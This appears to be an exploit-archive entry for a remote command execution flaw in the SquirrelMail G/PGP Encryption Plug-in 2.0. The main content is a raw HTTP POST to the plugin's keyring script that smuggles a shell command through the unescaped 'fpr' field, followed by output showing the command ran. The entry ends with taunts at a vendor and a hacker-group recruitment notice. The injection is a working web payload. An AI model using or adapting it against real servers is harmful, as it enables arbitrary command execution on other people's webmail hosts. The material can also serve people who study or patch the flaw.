Exploit for unknown platform in category web applications
SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
Bugtraq ID: 24782
There are various vulnerabilities in this software! One is in
$fpr is not escaped from shellcommands!
testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
testbox:/home/w00t# cat /tmp/w00t
So we just executed 'touch /tmp/w00t'!
WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
lol @ WabiSabiLabi!
oli and all members of jmp-esp!
jmp-esp is looking for people who are interested in IT security!
Currently we are looking for people who like to write articles for a
German ezine or are interested in exchanging informations, exploits...
IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
# 0day.today [2018-01-01] #